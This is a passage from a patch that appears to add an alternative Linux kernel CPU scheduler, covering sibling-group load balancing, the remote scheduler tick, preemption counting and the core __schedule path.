++	      !is_migration_disabled(curr) && (!rq->active_balance);
++
++	if (res)
++		rq->active_balance = 1;
++
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	if (res)
++		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
++				    &rq->active_balance_work);
++	return res;
++}
++
++/*
++ * sg_balance - slibing group balance check for run queue @rq
++ */
++static inline void sg_balance(struct rq *rq)
++{
++	cpumask_t chk;
++	int cpu = cpu_of(rq);
++
++	/* exit when cpu is offline */
++	if (unlikely(!rq->online))
++		return;
++
++	/*
++	 * Only cpu in slibing idle group will do the checking and then
++	 * find potential cpus which can migrate the current running task
++	 */
++	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
++	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
++	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
++		int i;
++
++		for_each_cpu_wrap(i, &chk, cpu) {
++			if (!cpumask_intersects(cpu_smt_mask(i), sched_idle_mask) &&\
++			    sg_balance_trigger(i))
++				return;
++		}
++	}
++}
++#endif /* CONFIG_SCHED_SMT */
++
++#ifdef CONFIG_NO_HZ_FULL
++
++struct tick_work {
++	int			cpu;
++	atomic_t		state;
++	struct delayed_work	work;
++};
++/* Values for ->state, see diagram below. */
++#define TICK_SCHED_REMOTE_OFFLINE	0
++#define TICK_SCHED_REMOTE_OFFLINING	1
++#define TICK_SCHED_REMOTE_RUNNING	2
++
++/*
++ * State diagram for ->state:
++ *
++ *
++ *          TICK_SCHED_REMOTE_OFFLINE
++ *                    |   ^
++ *                    |   |
++ *                    |   | sched_tick_remote()
++ *                    |   |
++ *                    |   |
++ *                    +--TICK_SCHED_REMOTE_OFFLINING
++ *                    |   ^
++ *                    |   |
++ * sched_tick_start() |   | sched_tick_stop()
++ *                    |   |
++ *                    V   |
++ *          TICK_SCHED_REMOTE_RUNNING
++ *
++ *
++ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
++ * and sched_tick_start() are happy to leave the state in RUNNING.
++ */
++
++static struct tick_work __percpu *tick_work_cpu;
++
++static void sched_tick_remote(struct work_struct *work)
++{
++	struct delayed_work *dwork = to_delayed_work(work);
++	struct tick_work *twork = container_of(dwork, struct tick_work, work);
++	int cpu = twork->cpu;
++	struct rq *rq = cpu_rq(cpu);
++	struct task_struct *curr;
++	unsigned long flags;
++	u64 delta;
++	int os;
++
++	/*
++	 * Handle the tick only if it appears the remote CPU is running in full
++	 * dynticks mode. The check is racy by nature, but missing a tick or
++	 * having one too much is no big deal because the scheduler tick updates
++	 * statistics and checks timeslices in a time-independent way, regardless
++	 * of when exactly it is running.
++	 */
++	if (!tick_nohz_tick_stopped_cpu(cpu))
++		goto out_requeue;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	curr = rq->curr;
++	if (cpu_is_offline(cpu))
++		goto out_unlock;
++
++	update_rq_clock(rq);
++	if (!is_idle_task(curr)) {
++		/*
++		 * Make sure the next tick runs within a reasonable
++		 * amount of time.
++		 */
++		delta = rq_clock_task(rq) - curr->last_ran;
++		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
++	}
++	scheduler_task_tick(rq);
++
++	calc_load_nohz_remote(rq);
++out_unlock:
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out_requeue:
++	/*
++	 * Run the remote tick once per second (1Hz). This arbitrary
++	 * frequency is large enough to avoid overload but short enough
++	 * to keep scheduler internal stats reasonably up to date.  But
++	 * first update state to reflect hotplug activity if required.
++	 */
++	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
++	if (os == TICK_SCHED_REMOTE_RUNNING)
++		queue_delayed_work(system_unbound_wq, dwork, HZ);
++}
++
++static void sched_tick_start(int cpu)
++{
++	int os;
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
++	if (os == TICK_SCHED_REMOTE_OFFLINE) {
++		twork->cpu = cpu;
++		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
++		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
++	}
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++static void sched_tick_stop(int cpu)
++{
++	struct tick_work *twork;
++	int os;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	/* There cannot be competing actions, but don't rely on stop-machine. */
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_OFFLINING);
++	WARN_ON_ONCE(os != TICK_SCHED_REMOTE_RUNNING);
++	/* Don't cancel, as this would mess up the state machine. */
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++int __init sched_tick_offload_init(void)
++{
++	tick_work_cpu = alloc_percpu(struct tick_work);
++	BUG_ON(!tick_work_cpu);
++	return 0;
++}
++
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_tick_start(int cpu) { }
++static inline void sched_tick_stop(int cpu) { }
++#endif
++
++#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
++				defined(CONFIG_PREEMPT_TRACER))
++/*
++ * If the value passed in is equal to the current preempt count
++ * then we just disabled preemption. Start timing the latency.
++ */
++static inline void preempt_latency_start(int val)
++{
++	if (preempt_count() == val) {
++		unsigned long ip = get_lock_parent_ip();
++#ifdef CONFIG_DEBUG_PREEMPT
++		current->preempt_disable_ip = ip;
++#endif
++		trace_preempt_off(CALLER_ADDR0, ip);
++	}
++}
++
++void preempt_count_add(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
++		return;
++#endif
++	__preempt_count_add(val);
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Spinlock count overflowing soon?
++	 */
++	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
++				PREEMPT_MASK - 10);
++#endif
++	preempt_latency_start(val);
++}
++EXPORT_SYMBOL(preempt_count_add);
++NOKPROBE_SYMBOL(preempt_count_add);
++
++/*
++ * If the value passed in equals to the current preempt count
++ * then we just enabled preemption. Stop timing the latency.
++ */
++static inline void preempt_latency_stop(int val)
++{
++	if (preempt_count() == val)
++		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
++}
++
++void preempt_count_sub(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
++		return;
++	/*
++	 * Is the spinlock portion underflowing?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
++			!(preempt_count() & PREEMPT_MASK)))
++		return;
++#endif
++
++	preempt_latency_stop(val);
++	__preempt_count_sub(val);
++}
++EXPORT_SYMBOL(preempt_count_sub);
++NOKPROBE_SYMBOL(preempt_count_sub);
++
++#else
++static inline void preempt_latency_start(int val) { }
++static inline void preempt_latency_stop(int val) { }
++#endif
++
++static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	return p->preempt_disable_ip;
++#else
++	return 0;
++#endif
++}
++
++/*
++ * Print scheduling while atomic bug:
++ */
++static noinline void __schedule_bug(struct task_struct *prev)
++{
++	/* Save this before calling printk(), since that will clobber it */
++	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
++
++	if (oops_in_progress)
++		return;
++
++	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
++		prev->comm, prev->pid, preempt_count());
++
++	debug_show_held_locks(prev);
++	print_modules();
++	if (irqs_disabled())
++		print_irqtrace_events(prev);
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
++	    && in_atomic_preempt_off()) {
++		pr_err("Preemption disabled at:");
++		print_ip_sym(KERN_ERR, preempt_disable_ip);
++	}
++	if (panic_on_warn)
++		panic("scheduling while atomic\n");
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++
++/*
++ * Various schedule()-time debugging checks and statistics:
++ */
++static inline void schedule_debug(struct task_struct *prev, bool preempt)
++{
++#ifdef CONFIG_SCHED_STACK_END_CHECK
++	if (task_stack_end_corrupted(prev))
++		panic("corrupted stack end detected inside scheduler\n");
++
++	if (task_scs_end_corrupted(prev))
++		panic("corrupted shadow stack detected inside scheduler\n");
++#endif
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
++		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
++			prev->comm, prev->pid, prev->non_block_count);
++		dump_stack();
++		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++	}
++#endif
++
++	if (unlikely(in_atomic_preempt_off())) {
++		__schedule_bug(prev);
++		preempt_count_set(PREEMPT_DISABLED);
++	}
++	rcu_sleep_check();
++	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
++
++	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
++
++	schedstat_inc(this_rq()->sched_count);
++}
++
++/*
++ * Compile time debug macro
++ * #define ALT_SCHED_DEBUG
++ */
++
++#ifdef ALT_SCHED_DEBUG
++void alt_sched_debug(void)
++{
++	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
++	       sched_rq_pending_mask.bits[0],
++	       sched_idle_mask->bits[0],
++	       sched_sg_idle_mask.bits[0]);
++}
++#else
++inline void alt_sched_debug(void) {}
++#endif
++
++#ifdef	CONFIG_SMP
++
++#ifdef CONFIG_PREEMPT_RT
++#define SCHED_NR_MIGRATE_BREAK 8
++#else
++#define SCHED_NR_MIGRATE_BREAK 32
++#endif
++
++const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
++
++/*
++ * Migrate pending tasks in @rq to @dest_cpu
++ */
++static inline int
++migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
++{
++	struct task_struct *p, *skip = rq->curr;
++	int nr_migrated = 0;
++	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
++
++	while (skip != rq->idle && nr_tries &&
++	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
++		skip = sched_rq_next_task(p, rq);
++		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
++			__SCHED_DEQUEUE_TASK(p, rq, 0);
++			set_task_cpu(p, dest_cpu);
++			sched_task_sanity_check(p, dest_rq);
++			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
++			nr_migrated++;
++		}
++		nr_tries--;
++	}
++
++	return nr_migrated;
++}
++
++static inline int take_other_rq_tasks(struct rq *rq, int cpu)
++{
++	struct cpumask *topo_mask, *end_mask;
++
++	if (unlikely(!rq->online))
++		return 0;
++
++	if (cpumask_empty(&sched_rq_pending_mask))
++		return 0;
++
++	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
++	do {
++		int i;
++		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
++			int nr_migrated;
++			struct rq *src_rq;
++
++			src_rq = cpu_rq(i);
++			if (!do_raw_spin_trylock(&src_rq->lock))
++				continue;
++			spin_acquire(&src_rq->lock.dep_map,
++				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
++
++			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
++				src_rq->nr_running -= nr_migrated;
++				if (src_rq->nr_running < 2)
++					cpumask_clear_cpu(i, &sched_rq_pending_mask);
++
++				spin_release(&src_rq->lock.dep_map, _RET_IP_);
++				do_raw_spin_unlock(&src_rq->lock);
++
++				rq->nr_running += nr_migrated;
++				if (rq->nr_running > 1)
++					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
++
++				cpufreq_update_util(rq, 0);
++
++				return 1;
++			}
++
++			spin_release(&src_rq->lock.dep_map, _RET_IP_);
++			do_raw_spin_unlock(&src_rq->lock);
++		}
++	} while (++topo_mask < end_mask);
++
++	return 0;
++}
++#endif
++
++/*
++ * Timeslices below RESCHED_NS are considered as good as expired as there's no
++ * point rescheduling when there's so little time left.
++ */
++static inline void check_curr(struct task_struct *p, struct rq *rq)
++{
++	if (unlikely(rq->idle == p))
++		return;
++
++	update_curr(rq, p);
++
++	if (p->time_slice < RESCHED_NS)
++		time_slice_expired(p, rq);
++}
++
++static inline struct task_struct *
++choose_next_task(struct rq *rq, int cpu)
++{
++	struct task_struct *next;
++
++	if (unlikely(rq->skip)) {
++		next = rq_runnable_task(rq);
++		if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++			if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++				rq->skip = NULL;
++				schedstat_inc(rq->sched_goidle);
++				return next;
++#ifdef	CONFIG_SMP
++			}
++			next = rq_runnable_task(rq);
++#endif
++		}
++		rq->skip = NULL;
++#ifdef CONFIG_HIGH_RES_TIMERS
++		hrtick_start(rq, next->time_slice);
++#endif
++		return next;
++	}
++
++	next = sched_rq_first_task(rq);
++	if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++		if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++			schedstat_inc(rq->sched_goidle);
++			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
++			return next;
++#ifdef	CONFIG_SMP
++		}
++		next = sched_rq_first_task(rq);
++#endif
++	}
++#ifdef CONFIG_HIGH_RES_TIMERS
++	hrtick_start(rq, next->time_slice);
++#endif
++	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
++	 * next);*/
++	return next;
++}
++
++/*
++ * Constants for the sched_mode argument of __schedule().
++ *
++ * The mode argument allows RT enabled kernels to differentiate a
++ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
++ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
++ * optimize the AND operation out and just check for zero.
++ */
++#define SM_NONE			0x0
++#define SM_PREEMPT		0x1
++#define SM_RTLOCK_WAIT		0x2
++
++#ifndef CONFIG_PREEMPT_RT
++# define SM_MASK_PREEMPT	(~0U)
++#else
++# define SM_MASK_PREEMPT	SM_PREEMPT
++#endif
++
++/*
++ * schedule() is the main scheduler function.
++ *
++ * The main means of driving the scheduler and thus entering this function are:
++ *
++ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
++ *
++ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
++ *      paths. For example, see arch/x86/entry_64.S.
++ *
++ *      To drive preemption between tasks, the scheduler sets the flag in timer
++ *      interrupt handler scheduler_tick().
++ *
++ *   3. Wakeups don't really cause entry into schedule(). They add a
++ *      task to the run-queue and that's it.
++ *
++ *      Now, if the new task added to the run-queue preempts the current
++ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
++ *      called on the nearest possible occasion:
++ *
++ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
++ *
++ *         - in syscall or exception context, at the next outmost
++ *           preempt_enable(). (this might be as soon as the wake_up()'s
++ *           spin_unlock()!)
++ *
++ *         - in IRQ context, return from interrupt-handler to
++ *           preemptible context
++ *
++ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
++ *         then at the next:
++ *
++ *          - cond_resched() call
++ *          - explicit schedule() call
++ *          - return from syscall or exception to user-space
++ *          - return from interrupt-handler to user-space
++ *
++ * WARNING: must be called with preemption disabled!
++ */
++static void __sched notrace __schedule(unsigned int sched_mode)
++{
++	struct task_struct *prev, *next;
++	unsigned long *switch_count;
++	unsigned long prev_state;
++	struct rq *rq;
++	int cpu;
++	int deactivated = 0;
++
++	cpu = smp_processor_id();
++	rq = cpu_rq(cpu);
++	prev = rq->curr;
++
++	schedule_debug(prev, !!sched_mode);
++
++	/* by passing sched_feat(HRTICK) checking which Alt schedule FW doesn't support */
++	hrtick_clear(rq);
++
++	local_irq_disable();
++	rcu_note_context_switch(!!sched_mode);
++
++	/*
++	 * Make sure that signal_pending_state()->signal_pending() below
++	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
++	 * done by the caller to avoid the race with signal_wake_up():
++	 *
++	 * __set_current_state(@state)		signal_wake_up()
++	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
++	 *					  wake_up_state(p, state)
++	 *   LOCK rq->lock			    LOCK p->pi_state
++	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
++	 *     if (signal_pending_state())	    if (p->state & @state)
++	 *
++	 * Also, the membarrier system call requires a full memory barrier
++	 * after coming from user-space, before storing to rq->curr.
++	 */
++	raw_spin_lock(&rq->lock);
++	smp_mb__after_spinlock();
++
++	update_rq_clock(rq);
++
++	switch_count = &prev->nivcsw;
++	/*
++	 * We must load prev->state once (task_struct::state is volatile), such
++	 * that we form a control dependency vs deactivate_task() below.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
++		if (signal_pending_state(prev_state, prev)) {
++			WRITE_ONCE(prev->__state, TASK_RUNNING);
++		} else {
++			prev->sched_contributes_to_load =
++				(prev_state & TASK_UNINTERRUPTIBLE) &&
++				!(prev_state & TASK_NOLOAD) &&
++				!(prev_state & TASK_FROZEN);
++
++			if (prev->sched_contributes_to_load)
++				rq->nr_uninterruptible++;
++
++			/*
++			 * __schedule()			ttwu()
++			 *   prev_state = prev->state;    if (p->on_rq && ...)
++			 *   if (prev_state)		    goto out;
++			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
++			 *				  p->state = TASK_WAKING
++			 *
++			 * Where __schedule() and ttwu() have matching control dependencies.
++			 *
++			 * After this, schedule() must not care about p->state any more.
++			 */
++			sched_task_deactivate(prev, rq);
++			deactivate_task(prev, rq);
++			deactivated = 1;
++
++			if (prev->in_iowait) {
++				atomic_inc(&rq->nr_iowait);
++				delayacct_blkio_start();
++			}
++		}
++		switch_count = &prev->nvcsw;
++	}
++
++	check_curr(prev, rq);
++
++	next = choose_next_task(rq, cpu);
++	clear_tsk_need_resched(prev);
++	clear_preempt_need_resched();
++#ifdef CONFIG_SCHED_DEBUG
++	rq->last_seen_need_resched_ns = 0;
++#endif
++
++	if (likely(prev != next)) {
++		if (deactivated)
++			update_sched_preempt_mask(rq);
++		next->last_ran = rq->clock_task;
++		rq->last_ts_switch = rq->clock;
++
++		rq->nr_switches++;
++		/*
++		 * RCU users of rcu_dereference(rq->curr) may not see
++		 * changes to task_struct made by pick_next_task().
++		 */
++		RCU_INIT_POINTER(rq->curr, next);
++		/*
++		 * The membarrier system call requires each architecture
++		 * to have a full memory barrier after updating
++		 * rq->curr, before returning to user-space.
++		 *
++		 * Here are the schemes providing that barrier on the
++		 * various architectures:
++		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
++		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
++		 * - finish_lock_switch() for weakly-ordered
++		 *   architectures where spin_unlock is a full barrier,
++		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
++		 *   is a RELEASE barrier),
++		 */
++		++*switch_count;
++
++		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
++
++		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
++
++		/* Also unlocks the rq: */
++		rq = context_switch(rq, prev, next);
++	} else {
++		__balance_callbacks(rq);
++		raw_spin_unlock_irq(&rq->lock);
++	}
++
++#ifdef CONFIG_SCHED_SMT
++	sg_balance(rq);
++#endif
++}
++
++void __noreturn do_task_dead(void)
++{
++	/* Causes final put_task_struct in finish_task_switch(): */
++	set_special_state(TASK_DEAD);
++
++	/* Tell freezer to ignore us: */
++	current->flags |= PF_NOFREEZE;
++
++	__schedule(SM_NONE);
++	BUG();
++
++	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
++	for (;;)
++		cpu_relax();
++}
++
++static inline void sched_submit_work(struct task_struct *tsk)
++{
++	unsigned int task_flags;
++
++	if (task_is_running(tsk))
++		return;
++
++	task_flags = tsk->flags;
++	/*
++	 * If a worker goes to sleep, notify and ask workqueue whether it
++	 * wants to wake up a task to maintain concurrency.
++	 */
++	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (task_flags & PF_WQ_WORKER)
++			wq_worker_sleeping(tsk);
++		else
++			io_wq_worker_sleeping(tsk);
++	}
++
++	/*
++	 * spinlock and rwlock must not flush block requests.  This will
++	 * deadlock if the callback attempts to acquire a lock which is
++	 * already acquired.
++	 */
++	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
++
++	/*
++	 * If we are going to sleep and we have plugged IO queued,
++	 * make sure to submit it to avoid deadlocks.
++	 */
++	blk_flush_plug(tsk->plug, true);
++}
++
++static void sched_update_worker(struct task_struct *tsk)
++{
++	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (tsk->flags & PF_WQ_WORKER)
++			wq_worker_running(tsk);
++		else
++			io_wq_worker_running(tsk);
++	}
++}
++
++asmlinkage __visible void __sched schedule(void)
++{
++	struct task_struct *tsk = current;
++
++	sched_submit_work(tsk);
++	do {
++		preempt_disable();
++		__schedule(SM_NONE);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++	sched_update_worker(tsk);
++}
++EXPORT_SYMBOL(schedule);
++
++/*
++ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
++ * state (have scheduled out non-voluntarily) by making sure that all
++ * tasks have either left the run queue or have gone into user space.
++ * As idle tasks do not do either, they must not ever be preempted
++ * (schedule out non-voluntarily).
++ *
++ * schedule_idle() is similar to schedule_preempt_disable() except that it
++ * never enables preemption because it does not call sched_submit_work().
++ */
++void __sched schedule_idle(void)
++{
++	/*
++	 * As this skips calling sched_submit_work(), which the idle task does
++	 * regardless because that function is a nop when the task is in a
++	 * TASK_RUNNING state, make sure this isn't used someplace that the
++	 * current task can be in any other state. Note, idle is always in the
++	 * TASK_RUNNING state.
++	 */
++	WARN_ON_ONCE(current->__state);
++	do {
++		__schedule(SM_NONE);
++	} while (need_resched());
++}
++
++#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
++asmlinkage __visible void __sched schedule_user(void)
++{
++	/*
++	 * If we come here after a random call to set_need_resched(),
++	 * or we have been woken up remotely but the IPI has not yet arrived,
++	 * we haven't yet exited the RCU idle mode. Do it here manually until
++	 * we find a better solution.
++	 *
++	 * NB: There are buggy callers of this function.  Ideally we
++	 * should warn if prev_state != CONTEXT_USER, but that will trigger
++	 * too frequently to make sense yet.
++	 */
++	enum ctx_state prev_state = exception_enter();
++	schedule();
++	exception_exit(prev_state);
++}
++#endif
++
++/**
++ * schedule_preempt_disabled - called with preemption disabled
++ *
++ * Returns with preemption disabled. Note: preempt_count must be 1
++ */
++void __sched schedule_preempt_disabled(void)
++{
++	sched_preempt_enable_no_resched();
++	schedule();
++	preempt_disable();
++}
++
++#ifdef CONFIG_PREEMPT_RT
++void __sched notrace schedule_rtlock(void)
++{
++	do {
++		preempt_disable();
++		__schedule(SM_RTLOCK_WAIT);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++}
++NOKPROBE_SYMBOL(schedule_rtlock);
++#endif
++
++static void __sched notrace preempt_schedule_common(void)
++{
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		__schedule(SM_PREEMPT);
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++
++		/*
++		 * Check again in case we missed a preemption opportunity
++		 * between schedule and now.
++		 */
++	} while (need_resched());
++}
++
++#ifdef CONFIG_PREEMPTION
++/*
++ * This is the entry point to schedule() from in-kernel preemption
++ * off of preempt_enable.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule(void)
++{
++	/*
++	 * If there is a non-zero preempt_count or interrupts are disabled,
++	 * we do not want to preempt the current task. Just return..
++	 */
++	if (likely(!preemptible()))
++		return;
++
++	preempt_schedule_common();
++}
++NOKPROBE_SYMBOL(preempt_schedule);
++EXPORT_SYMBOL(preempt_schedule);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_dynamic_enabled
++#define preempt_schedule_dynamic_enabled	preempt_schedule
++#define preempt_schedule_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
++void __sched notrace dynamic_preempt_schedule(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
++		return;
++	preempt_schedule();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule);
++EXPORT_SYMBOL(dynamic_preempt_schedule);
++#endif
++#endif
++
++/**
++ * preempt_schedule_notrace - preempt_schedule called by tracing
++ *
++ * The tracing infrastructure uses preempt_enable_notrace to prevent
++ * recursion and tracing preempt enabling caused by the tracing
++ * infrastructure itself. But as tracing can happen in areas coming
++ * from userspace or just about to enter userspace, a preempt enable
++ * can occur before user_exit() is called. This will cause the scheduler
++ * to be called when the system is still in usermode.
++ *
++ * To prevent this, the preempt_enable_notrace will use this function
++ * instead of preempt_schedule() to exit user context if needed before
++ * calling the scheduler.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
++{
++	enum ctx_state prev_ctx;
++
++	if (likely(!preemptible()))
++		return;
++
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		/*
++		 * Needs preempt disabled in case user_exit() is traced
++		 * and the tracer calls preempt_enable_notrace() causing
++		 * an infinite recursion.
++		 */
++		prev_ctx = exception_enter();
++		__schedule(SM_PREEMPT);
++		exception_exit(prev_ctx);
++
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++	} while (need_resched());
++}
++EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_notrace_dynamic_enabled
++#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
++#define preempt_schedule_notrace_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
++void __sched notrace dynamic_preempt_schedule_notrace(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
++		return;
++	preempt_schedule_notrace();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
++EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
++#endif
++#endif
++
++#endif /* CONFIG_PREEMPTION */
++
++/*
++ * This is the entry point to schedule() from kernel preemption
++ * off of irq context.
++ * Note, that this is called and return with irqs disabled. This will
++ * protect us against recursive calling from irq.
++ */
++asmlinkage __visible void __sched preempt_schedule_irq(void)
++{
++	enum ctx_state prev_state;
++
++	/* Catch callers which need to be fixed */
++	BUG_ON(preempt_count() || !irqs_disabled());
++
++	prev_state = exception_enter();
++
++	do {
++		preempt_disable();
++		local_irq_enable();
++		__schedule(SM_PREEMPT);
++		local_irq_disable();
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++
++	exception_exit(prev_state);
++}
++
++int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
++			  void *key)
++{
++	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
++	return try_to_wake_up(curr->private, mode, wake_flags);
++}
++EXPORT_SYMBOL(default_wake_function);
++
++static inline void check_task_changed(struct task_struct *p, struct rq *rq)
++{
++	int idx;
++
++	/* Trigger resched if task sched_prio has been modified. */
++	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
++		requeue_task(p, rq, idx);
++		check_preempt_curr(rq);
